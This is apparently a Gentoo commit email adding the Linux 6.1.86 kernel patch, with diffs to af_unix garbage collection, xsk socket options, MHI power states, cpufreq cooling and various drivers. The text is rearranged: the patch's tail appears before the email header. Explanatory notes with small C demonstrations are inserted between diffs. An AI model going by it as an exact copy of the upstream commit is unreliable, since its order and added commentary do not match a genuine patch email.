+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -968,11 +968,11 @@ static struct sock *unix_create1(struct net *net, struct socket *sock, int kern,
+ 	sk->sk_write_space	= unix_write_space;
+ 	sk->sk_max_ack_backlog	= net->unx.sysctl_max_dgram_qlen;
+ 	sk->sk_destruct		= unix_sock_destructor;
+-	u	  = unix_sk(sk);
++	u = unix_sk(sk);
++	u->inflight = 0;
+ 	u->path.dentry = NULL;
+ 	u->path.mnt = NULL;
+ 	spin_lock_init(&u->lock);
+-	atomic_long_set(&u->inflight, 0);
+ 	INIT_LIST_HEAD(&u->link);
+ 	mutex_init(&u->iolock); /* single task reading lock */
+ 	mutex_init(&u->bindlock); /* single task binding lock */
+@@ -2677,7 +2677,9 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 				}
+ 			} else if (!(flags & MSG_PEEK)) {
+ 				skb_unlink(skb, &sk->sk_receive_queue);
+-				consume_skb(skb);
++				WRITE_ONCE(u->oob_skb, NULL);
++				if (!WARN_ON_ONCE(skb_unref(skb)))
++					kfree_skb(skb);
+ 				skb = skb_peek(&sk->sk_receive_queue);
+ 			}
+ 		}
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index 9bfffe2a7f020..85c6f05c0fa3c 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -166,17 +166,18 @@ static void scan_children(struct sock *x, void (*func)(struct unix_sock *),
+ 
+ static void dec_inflight(struct unix_sock *usk)
+ {
+-	atomic_long_dec(&usk->inflight);
++	usk->inflight--;
+ }
+ 
+ static void inc_inflight(struct unix_sock *usk)
+ {
+-	atomic_long_inc(&usk->inflight);
++	usk->inflight++;
+ }
+ 
+ static void inc_inflight_move_tail(struct unix_sock *u)
+ {
+-	atomic_long_inc(&u->inflight);
++	u->inflight++;
++
+ 	/* If this still might be part of a cycle, move it to the end
+ 	 * of the list, so that it's checked even if it was already
+ 	 * passed over
+@@ -234,20 +235,34 @@ void unix_gc(void)
+ 	 * receive queues.  Other, non candidate sockets _can_ be
+ 	 * added to queue, so we must make sure only to touch
+ 	 * candidates.
++	 *
++	 * Embryos, though never candidates themselves, affect which
++	 * candidates are reachable by the garbage collector.  Before
++	 * being added to a listener's queue, an embryo may already
++	 * receive data carrying SCM_RIGHTS, potentially making the
++	 * passed socket a candidate that is not yet reachable by the
++	 * collector.  It becomes reachable once the embryo is
++	 * enqueued.  Therefore, we must ensure that no SCM-laden
++	 * embryo appears in a (candidate) listener's queue between
++	 * consecutive scan_children() calls.
+ 	 */
+ 	list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
++		struct sock *sk = &u->sk;
+ 		long total_refs;
+-		long inflight_refs;
+ 
+-		total_refs = file_count(u->sk.sk_socket->file);
+-		inflight_refs = atomic_long_read(&u->inflight);
++		total_refs = file_count(sk->sk_socket->file);
+ 
+-		BUG_ON(inflight_refs < 1);
+-		BUG_ON(total_refs < inflight_refs);
+-		if (total_refs == inflight_refs) {
++		BUG_ON(!u->inflight);
++		BUG_ON(total_refs < u->inflight);
++		if (total_refs == u->inflight) {
+ 			list_move_tail(&u->link, &gc_candidates);
+ 			__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
+ 			__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
++
++			if (sk->sk_state == TCP_LISTEN) {
++				unix_state_lock(sk);
++				unix_state_unlock(sk);
++			}
+ 		}
+ 	}
+ 
+@@ -271,7 +286,7 @@ void unix_gc(void)
+ 		/* Move cursor to after the current position. */
+ 		list_move(&cursor, &u->link);
+ 
+-		if (atomic_long_read(&u->inflight) > 0) {
++		if (u->inflight) {
+ 			list_move_tail(&u->link, &not_cycle_list);
+ 			__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
+ 			scan_children(&u->sk, inc_inflight_move_tail, NULL);
+diff --git a/net/unix/scm.c b/net/unix/scm.c
+index d1048b4c2baaf..4eff7da9f6f96 100644
+--- a/net/unix/scm.c
++++ b/net/unix/scm.c
+@@ -52,12 +52,13 @@ void unix_inflight(struct user_struct *user, struct file *fp)
+ 	if (s) {
+ 		struct unix_sock *u = unix_sk(s);
+ 
+-		if (atomic_long_inc_return(&u->inflight) == 1) {
++		if (!u->inflight) {
+ 			BUG_ON(!list_empty(&u->link));
+ 			list_add_tail(&u->link, &gc_inflight_list);
+ 		} else {
+ 			BUG_ON(list_empty(&u->link));
+ 		}
++		u->inflight++;
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight + 1);
+ 	}
+@@ -74,10 +75,11 @@ void unix_notinflight(struct user_struct *user, struct file *fp)
+ 	if (s) {
+ 		struct unix_sock *u = unix_sk(s);
+ 
+-		BUG_ON(!atomic_long_read(&u->inflight));
++		BUG_ON(!u->inflight);
+ 		BUG_ON(list_empty(&u->link));
+ 
+-		if (atomic_long_dec_and_test(&u->inflight))
++		u->inflight--;
++		if (!u->inflight)
+ 			list_del_init(&u->link);
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight - 1);
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 5c8e02d56fd43..e3bdfc517424d 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -1127,6 +1127,8 @@ static int xsk_setsockopt(struct socket *sock, int level, int optname,
+ 		struct xsk_queue **q;
+ 		int entries;
+ 
++		if (optlen < sizeof(entries))
++			return -EINVAL;
+ 		if (copy_from_sockptr(&entries, optval, sizeof(entries)))
+ 			return -EFAULT;
+ 
+diff --git a/tools/testing/selftests/timers/posix_timers.c b/tools/testing/selftests/timers/posix_timers.c
+index 0ba500056e635..193a984f512c3 100644
+--- a/tools/testing/selftests/timers/posix_timers.c
++++ b/tools/testing/selftests/timers/posix_timers.c
+@@ -66,7 +66,7 @@ static int check_diff(struct timeval start, struct timeval end)
+ 	diff = end.tv_usec - start.tv_usec;
+ 	diff += (end.tv_sec - start.tv_sec) * USECS_PER_SEC;
+ 
+-	if (abs(diff - DELAY * USECS_PER_SEC) > USECS_PER_SEC / 2) {
++	if (llabs(diff - DELAY * USECS_PER_SEC) > USECS_PER_SEC / 2) {
+ 		printf("Diff too high: %lld..", diff);
+ 		return -1;
+ 	}
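abs() takes and returns int, so the long long diff was silently truncated before the comparison; llabs() keeps the full width. A two-line demonstration of the truncation, with a value chosen to show the wrap:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	long long diff = 5000000000LL;	/* ~5e9, does not fit in int */

	/* abs() sees its argument converted to int; llabs() does not. */
	printf("abs:   %d\n", abs((int)diff));	/* wrapped value */
	printf("llabs: %lld\n", llabs(diff));	/* 5000000000 */
	return 0;
}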


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-13 13:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-13 13:07 UTC (permalink / raw
  To: gentoo-commits

commit:     98e85977046ab355bf2f834605abd83404ffc4ad
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Apr 13 13:07:07 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Apr 13 13:07:07 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=98e85977

Linux patch 6.1.86

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1085_linux-6.1.86.patch | 2257 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2261 insertions(+)

diff --git a/0000_README b/0000_README
index beb8ee68..d1148845 100644
--- a/0000_README
+++ b/0000_README
@@ -383,6 +383,10 @@ Patch:  1084_linux-6.1.85.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.85
 
+Patch:  1085_linux-6.1.86.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.86
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1085_linux-6.1.86.patch b/1085_linux-6.1.86.patch
new file mode 100644
index 00000000..64dcadfd
--- /dev/null
+++ b/1085_linux-6.1.86.patch
@@ -0,0 +1,2257 @@
+diff --git a/Makefile b/Makefile
+index 5dff9ff999981..baddd8ed81868 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 85
++SUBLEVEL = 86
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328.dtsi b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+index 905a50aa5dc38..d42846efff2fe 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+@@ -741,11 +741,20 @@ hdmi: hdmi@ff3c0000 {
+ 		status = "disabled";
+ 
+ 		ports {
+-			hdmi_in: port {
++			#address-cells = <1>;
++			#size-cells = <0>;
++
++			hdmi_in: port@0 {
++				reg = <0>;
++
+ 				hdmi_in_vop: endpoint {
+ 					remote-endpoint = <&vop_out_hdmi>;
+ 				};
+ 			};
++
++			hdmi_out: port@1 {
++				reg = <1>;
++			};
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index a7e6eccb14cc6..8363cc13ec517 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -1906,6 +1906,7 @@ simple-audio-card,codec {
+ 	hdmi: hdmi@ff940000 {
+ 		compatible = "rockchip,rk3399-dw-hdmi";
+ 		reg = <0x0 0xff940000 0x0 0x20000>;
++		reg-io-width = <4>;
+ 		interrupts = <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH 0>;
+ 		clocks = <&cru PCLK_HDMI_CTRL>,
+ 			 <&cru SCLK_HDMI_SFR>,
+@@ -1914,13 +1915,16 @@ hdmi: hdmi@ff940000 {
+ 			 <&cru PLL_VPLL>;
+ 		clock-names = "iahb", "isfr", "cec", "grf", "ref";
+ 		power-domains = <&power RK3399_PD_HDCP>;
+-		reg-io-width = <4>;
+ 		rockchip,grf = <&grf>;
+ 		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 
+ 		ports {
+-			hdmi_in: port {
++			#address-cells = <1>;
++			#size-cells = <0>;
++
++			hdmi_in: port@0 {
++				reg = <0>;
+ 				#address-cells = <1>;
+ 				#size-cells = <0>;
+ 
+@@ -1933,6 +1937,10 @@ hdmi_in_vopl: endpoint@1 {
+ 					remote-endpoint = <&vopl_out_hdmi>;
+ 				};
+ 			};
++
++			hdmi_out: port@1 {
++				reg = <1>;
++			};
+ 		};
+ 	};
+ 
+diff --git a/arch/x86/events/amd/lbr.c b/arch/x86/events/amd/lbr.c
+index b8fe74e8e0a60..48f4095f500d4 100644
+--- a/arch/x86/events/amd/lbr.c
++++ b/arch/x86/events/amd/lbr.c
+@@ -173,9 +173,11 @@ void amd_pmu_lbr_read(void)
+ 
+ 		/*
+ 		 * Check if a branch has been logged; if valid = 0, spec = 0
+-		 * then no branch was recorded
++		 * then no branch was recorded; if reserved = 1 then an
++		 * erroneous branch was recorded (see Erratum 1452)
+ 		 */
+-		if (!entry.to.split.valid && !entry.to.split.spec)
++		if ((!entry.to.split.valid && !entry.to.split.spec) ||
++		    entry.to.split.reserved)
+ 			continue;
+ 
+ 		perf_clear_branch_entry_bitfields(br + out);
+diff --git a/block/blk-stat.c b/block/blk-stat.c
+index da9407b7d4abf..41be89ecaf20e 100644
+--- a/block/blk-stat.c
++++ b/block/blk-stat.c
+@@ -28,7 +28,7 @@ void blk_rq_stat_init(struct blk_rq_stat *stat)
+ /* src is a per-cpu stat, mean isn't initialized */
+ void blk_rq_stat_sum(struct blk_rq_stat *dst, struct blk_rq_stat *src)
+ {
+-	if (!src->nr_samples)
++	if (dst->nr_samples + src->nr_samples <= dst->nr_samples)
+ 		return;
+ 
+ 	dst->min = min(dst->min, src->min);
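The new blk-stat condition folds two cases into one test: it bails out both when src contributes no samples and when the u32 sum would overflow, since a wrapped sum comes back less than or equal to the original dst counter. A hedged standalone version of that wraparound test:

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* True when merging src into dst would be a no-op (src empty) or
 * would overflow the 32-bit sample counter (the sum wraps down). */
static bool merge_would_wrap_or_noop(uint32_t dst, uint32_t src)
{
	return dst + src <= dst;
}

int main(void)
{
	printf("empty src: %d\n", merge_would_wrap_or_noop(10, 0));
	printf("normal:    %d\n", merge_would_wrap_or_noop(10, 5));
	printf("overflow:  %d\n", merge_would_wrap_or_noop(UINT32_MAX, 2));
	return 0;
}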
+diff --git a/drivers/acpi/sleep.c b/drivers/acpi/sleep.c
+index 539c12fbd2f14..6026e20f022a2 100644
+--- a/drivers/acpi/sleep.c
++++ b/drivers/acpi/sleep.c
+@@ -385,18 +385,6 @@ static const struct dmi_system_id acpisleep_dmi_table[] __initconst = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "20GGA00L00"),
+ 		},
+ 	},
+-	/*
+-	 * ASUS B1400CEAE hangs on resume from suspend (see
+-	 * https://bugzilla.kernel.org/show_bug.cgi?id=215742).
+-	 */
+-	{
+-	.callback = init_default_s3,
+-	.ident = "ASUS B1400CEAE",
+-	.matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "ASUS EXPERTBOOK B1400CEAE"),
+-		},
+-	},
+ 	{},
+ };
+ 
+diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c
+index bbad1207cdfd8..7a9d2da3c8146 100644
+--- a/drivers/bluetooth/btintel.c
++++ b/drivers/bluetooth/btintel.c
+@@ -411,7 +411,7 @@ int btintel_read_version(struct hci_dev *hdev, struct intel_version *ver)
+ 		return PTR_ERR(skb);
+ 	}
+ 
+-	if (skb->len != sizeof(*ver)) {
++	if (!skb || skb->len != sizeof(*ver)) {
+ 		bt_dev_err(hdev, "Intel version event size mismatch");
+ 		kfree_skb(skb);
+ 		return -EILSEQ;
+diff --git a/drivers/bluetooth/btmtk.c b/drivers/bluetooth/btmtk.c
+index 809762d64fc65..b77e337778a44 100644
+--- a/drivers/bluetooth/btmtk.c
++++ b/drivers/bluetooth/btmtk.c
+@@ -288,4 +288,5 @@ MODULE_LICENSE("GPL");
+ MODULE_FIRMWARE(FIRMWARE_MT7622);
+ MODULE_FIRMWARE(FIRMWARE_MT7663);
+ MODULE_FIRMWARE(FIRMWARE_MT7668);
++MODULE_FIRMWARE(FIRMWARE_MT7922);
+ MODULE_FIRMWARE(FIRMWARE_MT7961);
+diff --git a/drivers/bluetooth/btmtk.h b/drivers/bluetooth/btmtk.h
+index 2a88ea8e475e8..ee0b1d27aa5c0 100644
+--- a/drivers/bluetooth/btmtk.h
++++ b/drivers/bluetooth/btmtk.h
+@@ -4,6 +4,7 @@
+ #define FIRMWARE_MT7622		"mediatek/mt7622pr2h.bin"
+ #define FIRMWARE_MT7663		"mediatek/mt7663pr2h.bin"
+ #define FIRMWARE_MT7668		"mediatek/mt7668pr2h.bin"
++#define FIRMWARE_MT7922		"mediatek/BT_RAM_CODE_MT7922_1_1_hdr.bin"
+ #define FIRMWARE_MT7961		"mediatek/BT_RAM_CODE_MT7961_1_2_hdr.bin"
+ 
+ #define HCI_EV_WMT 0xe4
+diff --git a/drivers/bus/mhi/host/init.c b/drivers/bus/mhi/host/init.c
+index 04fbccff65ac2..60c1df048fa20 100644
+--- a/drivers/bus/mhi/host/init.c
++++ b/drivers/bus/mhi/host/init.c
+@@ -62,6 +62,7 @@ static const char * const mhi_pm_state_str[] = {
+ 	[MHI_PM_STATE_FW_DL_ERR] = "Firmware Download Error",
+ 	[MHI_PM_STATE_SYS_ERR_DETECT] = "SYS ERROR Detect",
+ 	[MHI_PM_STATE_SYS_ERR_PROCESS] = "SYS ERROR Process",
++	[MHI_PM_STATE_SYS_ERR_FAIL] = "SYS ERROR Failure",
+ 	[MHI_PM_STATE_SHUTDOWN_PROCESS] = "SHUTDOWN Process",
+ 	[MHI_PM_STATE_LD_ERR_FATAL_DETECT] = "Linkdown or Error Fatal Detect",
+ };
+diff --git a/drivers/bus/mhi/host/internal.h b/drivers/bus/mhi/host/internal.h
+index 01fd10a399b61..6abf09da4f618 100644
+--- a/drivers/bus/mhi/host/internal.h
++++ b/drivers/bus/mhi/host/internal.h
+@@ -88,6 +88,7 @@ enum mhi_pm_state {
+ 	MHI_PM_STATE_FW_DL_ERR,
+ 	MHI_PM_STATE_SYS_ERR_DETECT,
+ 	MHI_PM_STATE_SYS_ERR_PROCESS,
++	MHI_PM_STATE_SYS_ERR_FAIL,
+ 	MHI_PM_STATE_SHUTDOWN_PROCESS,
+ 	MHI_PM_STATE_LD_ERR_FATAL_DETECT,
+ 	MHI_PM_STATE_MAX
+@@ -104,14 +105,16 @@ enum mhi_pm_state {
+ #define MHI_PM_FW_DL_ERR				BIT(7)
+ #define MHI_PM_SYS_ERR_DETECT				BIT(8)
+ #define MHI_PM_SYS_ERR_PROCESS				BIT(9)
+-#define MHI_PM_SHUTDOWN_PROCESS				BIT(10)
++#define MHI_PM_SYS_ERR_FAIL				BIT(10)
++#define MHI_PM_SHUTDOWN_PROCESS				BIT(11)
+ /* link not accessible */
+-#define MHI_PM_LD_ERR_FATAL_DETECT			BIT(11)
++#define MHI_PM_LD_ERR_FATAL_DETECT			BIT(12)
+ 
+ #define MHI_REG_ACCESS_VALID(pm_state)			((pm_state & (MHI_PM_POR | MHI_PM_M0 | \
+ 						MHI_PM_M2 | MHI_PM_M3_ENTER | MHI_PM_M3_EXIT | \
+ 						MHI_PM_SYS_ERR_DETECT | MHI_PM_SYS_ERR_PROCESS | \
+-						MHI_PM_SHUTDOWN_PROCESS | MHI_PM_FW_DL_ERR)))
++						MHI_PM_SYS_ERR_FAIL | MHI_PM_SHUTDOWN_PROCESS |  \
++						MHI_PM_FW_DL_ERR)))
+ #define MHI_PM_IN_ERROR_STATE(pm_state)			(pm_state >= MHI_PM_FW_DL_ERR)
+ #define MHI_PM_IN_FATAL_STATE(pm_state)			(pm_state == MHI_PM_LD_ERR_FATAL_DETECT)
+ #define MHI_DB_ACCESS_VALID(mhi_cntrl)			(mhi_cntrl->pm_state & mhi_cntrl->db_access)
+diff --git a/drivers/bus/mhi/host/pm.c b/drivers/bus/mhi/host/pm.c
+index 8a4362d75fc43..27f8a40f288cf 100644
+--- a/drivers/bus/mhi/host/pm.c
++++ b/drivers/bus/mhi/host/pm.c
+@@ -36,7 +36,10 @@
+  *     M0 <--> M0
+  *     M0 -> FW_DL_ERR
+  *     M0 -> M3_ENTER -> M3 -> M3_EXIT --> M0
+- * L1: SYS_ERR_DETECT -> SYS_ERR_PROCESS --> POR
++ * L1: SYS_ERR_DETECT -> SYS_ERR_PROCESS
++ *     SYS_ERR_PROCESS -> SYS_ERR_FAIL
++ *     SYS_ERR_FAIL -> SYS_ERR_DETECT
++ *     SYS_ERR_PROCESS --> POR
+  * L2: SHUTDOWN_PROCESS -> LD_ERR_FATAL_DETECT
+  *     SHUTDOWN_PROCESS -> DISABLE
+  * L3: LD_ERR_FATAL_DETECT <--> LD_ERR_FATAL_DETECT
+@@ -93,7 +96,12 @@ static const struct mhi_pm_transitions dev_state_transitions[] = {
+ 	},
+ 	{
+ 		MHI_PM_SYS_ERR_PROCESS,
+-		MHI_PM_POR | MHI_PM_SHUTDOWN_PROCESS |
++		MHI_PM_POR | MHI_PM_SYS_ERR_FAIL | MHI_PM_SHUTDOWN_PROCESS |
++		MHI_PM_LD_ERR_FATAL_DETECT
++	},
++	{
++		MHI_PM_SYS_ERR_FAIL,
++		MHI_PM_SYS_ERR_DETECT | MHI_PM_SHUTDOWN_PROCESS |
+ 		MHI_PM_LD_ERR_FATAL_DETECT
+ 	},
+ 	/* L2 States */
+@@ -624,7 +632,13 @@ static void mhi_pm_sys_error_transition(struct mhi_controller *mhi_cntrl)
+ 					!in_reset, timeout);
+ 		if (!ret || in_reset) {
+ 			dev_err(dev, "Device failed to exit MHI Reset state\n");
+-			goto exit_sys_error_transition;
++			write_lock_irq(&mhi_cntrl->pm_lock);
++			cur_state = mhi_tryset_pm_state(mhi_cntrl,
++							MHI_PM_SYS_ERR_FAIL);
++			write_unlock_irq(&mhi_cntrl->pm_lock);
++			/* Shutdown may have occurred, otherwise cleanup now */
++			if (cur_state != MHI_PM_SYS_ERR_FAIL)
++				goto exit_sys_error_transition;
+ 		}
+ 
+ 		/*
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index c8912756fc06d..91efa23e0e8f3 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1525,7 +1525,8 @@ static int cpufreq_online(unsigned int cpu)
+ 	if (cpufreq_driver->ready)
+ 		cpufreq_driver->ready(policy);
+ 
+-	if (cpufreq_thermal_control_enabled(cpufreq_driver))
++	/* Register cpufreq cooling only for a new policy */
++	if (new_policy && cpufreq_thermal_control_enabled(cpufreq_driver))
+ 		policy->cdev = of_cpufreq_cooling_register(policy);
+ 
+ 	pr_debug("initialization complete\n");
+@@ -1609,11 +1610,6 @@ static void __cpufreq_offline(unsigned int cpu, struct cpufreq_policy *policy)
+ 	else
+ 		policy->last_policy = policy->policy;
+ 
+-	if (cpufreq_thermal_control_enabled(cpufreq_driver)) {
+-		cpufreq_cooling_unregister(policy->cdev);
+-		policy->cdev = NULL;
+-	}
+-
+ 	if (has_target())
+ 		cpufreq_exit_governor(policy);
+ 
+@@ -1674,6 +1670,15 @@ static void cpufreq_remove_dev(struct device *dev, struct subsys_interface *sif)
+ 		return;
+ 	}
+ 
++	/*
++	 * Unregister cpufreq cooling once all the CPUs of the policy are
++	 * removed.
++	 */
++	if (cpufreq_thermal_control_enabled(cpufreq_driver)) {
++		cpufreq_cooling_unregister(policy->cdev);
++		policy->cdev = NULL;
++	}
++
+ 	/* We did light-weight exit earlier, do full tear down now */
+ 	if (cpufreq_driver->offline)
+ 		cpufreq_driver->exit(policy);
+diff --git a/drivers/cpuidle/driver.c b/drivers/cpuidle/driver.c
+index f70aa17e2a8e0..c594e28adddf3 100644
+--- a/drivers/cpuidle/driver.c
++++ b/drivers/cpuidle/driver.c
+@@ -16,6 +16,7 @@
+ #include <linux/cpumask.h>
+ #include <linux/tick.h>
+ #include <linux/cpu.h>
++#include <linux/math64.h>
+ 
+ #include "cpuidle.h"
+ 
+@@ -185,7 +186,7 @@ static void __cpuidle_driver_init(struct cpuidle_driver *drv)
+ 			s->target_residency_ns = 0;
+ 
+ 		if (s->exit_latency > 0)
+-			s->exit_latency_ns = s->exit_latency * NSEC_PER_USEC;
++			s->exit_latency_ns = mul_u32_u32(s->exit_latency, NSEC_PER_USEC);
+ 		else if (s->exit_latency_ns < 0)
+ 			s->exit_latency_ns =  0;
+ 	}
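exit_latency is a u32 and NSEC_PER_USEC is 1000, so the old multiply wrapped in 32 bits for latencies above roughly 4.29 seconds before being widened; mul_u32_u32() performs the multiplication in 64 bits. A hedged illustration of the difference, with the helper reimplemented locally:

#include <stdint.h>
#include <stdio.h>

#define NSEC_PER_USEC 1000u

/* Widen both operands before multiplying, as the kernel helper does. */
static uint64_t mul_u32_u32(uint32_t a, uint32_t b)
{
	return (uint64_t)a * b;
}

int main(void)
{
	uint32_t exit_latency_us = 5000000;	/* 5 s, exaggerated */

	/* The 32-bit multiply wraps, then gets zero-extended: */
	uint64_t wrong = exit_latency_us * NSEC_PER_USEC;
	uint64_t right = mul_u32_u32(exit_latency_us, NSEC_PER_USEC);

	printf("wrapped: %llu ns\n", (unsigned long long)wrong);
	printf("widened: %llu ns\n", (unsigned long long)right);
	return 0;
}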
+diff --git a/drivers/firmware/tegra/bpmp-debugfs.c b/drivers/firmware/tegra/bpmp-debugfs.c
+index 9d3874cdaaeef..34e4152477f3b 100644
+--- a/drivers/firmware/tegra/bpmp-debugfs.c
++++ b/drivers/firmware/tegra/bpmp-debugfs.c
+@@ -81,7 +81,7 @@ static const char *get_filename(struct tegra_bpmp *bpmp,
+ 
+ 	root_path_buf = kzalloc(root_path_buf_len, GFP_KERNEL);
+ 	if (!root_path_buf)
+-		goto out;
++		return NULL;
+ 
+ 	root_path = dentry_path(bpmp->debugfs_mirror, root_path_buf,
+ 				root_path_buf_len);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index e191d38f3da62..3f403afd6de83 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -765,8 +765,8 @@ static int kfd_ioctl_get_process_apertures_new(struct file *filp,
+ 	 * nodes, but not more than args->num_of_nodes as that is
+ 	 * the amount of memory allocated by user
+ 	 */
+-	pa = kzalloc((sizeof(struct kfd_process_device_apertures) *
+-				args->num_of_nodes), GFP_KERNEL);
++	pa = kcalloc(args->num_of_nodes, sizeof(struct kfd_process_device_apertures),
++		     GFP_KERNEL);
+ 	if (!pa)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h b/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h
+index 4220fd8fdd60c..54cd86060f4d6 100644
+--- a/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h
++++ b/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h
+@@ -57,10 +57,10 @@ void mod_stats_update_event(struct mod_stats *mod_stats,
+ 		unsigned int length);
+ 
+ void mod_stats_update_flip(struct mod_stats *mod_stats,
+-		unsigned long timestamp_in_ns);
++		unsigned long long timestamp_in_ns);
+ 
+ void mod_stats_update_vupdate(struct mod_stats *mod_stats,
+-		unsigned long timestamp_in_ns);
++		unsigned long long timestamp_in_ns);
+ 
+ void mod_stats_update_freesync(struct mod_stats *mod_stats,
+ 		unsigned int v_total_min,
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index d5c15292ae937..3fe5e6439c401 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -117,6 +117,12 @@ static const struct drm_dmi_panel_orientation_data lcd1080x1920_leftside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd1080x1920_rightside_up = {
++	.width = 1080,
++	.height = 1920,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data lcd1200x1920_rightside_up = {
+ 	.width = 1200,
+ 	.height = 1920,
+@@ -279,6 +285,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "G1618-03")
+ 		},
+ 		.driver_data = (void *)&lcd720x1280_rightside_up,
++	}, {	/* GPD Win Mini */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "GPD"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "G1617-01")
++		},
++		.driver_data = (void *)&lcd1080x1920_rightside_up,
+ 	}, {	/* I.T.Works TW891 */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "To be filled by O.E.M."),
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index eb08020154f30..7e6648b277b25 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -1415,9 +1415,6 @@ static int vc4_prepare_fb(struct drm_plane *plane,
+ 
+ 	drm_gem_plane_helper_prepare_fb(plane, state);
+ 
+-	if (plane->state->fb == state->fb)
+-		return 0;
+-
+ 	return vc4_bo_inc_usecnt(bo);
+ }
+ 
+@@ -1426,7 +1423,7 @@ static void vc4_cleanup_fb(struct drm_plane *plane,
+ {
+ 	struct vc4_bo *bo;
+ 
+-	if (plane->state->fb == state->fb || !state->fb)
++	if (!state->fb)
+ 		return;
+ 
+ 	bo = to_vc4_bo(&drm_fb_dma_get_gem_obj(state->fb, 0)->base);
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index b7f9023442890..462a10d6a5762 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -34,6 +34,7 @@ MODULE_AUTHOR("Sean Hefty");
+ MODULE_DESCRIPTION("InfiniBand CM");
+ MODULE_LICENSE("Dual BSD/GPL");
+ 
++#define CM_DESTROY_ID_WAIT_TIMEOUT 10000 /* msecs */
+ static const char * const ibcm_rej_reason_strs[] = {
+ 	[IB_CM_REJ_NO_QP]			= "no QP",
+ 	[IB_CM_REJ_NO_EEC]			= "no EEC",
+@@ -1025,10 +1026,20 @@ static void cm_reset_to_idle(struct cm_id_private *cm_id_priv)
+ 	}
+ }
+ 
++static noinline void cm_destroy_id_wait_timeout(struct ib_cm_id *cm_id)
++{
++	struct cm_id_private *cm_id_priv;
++
++	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
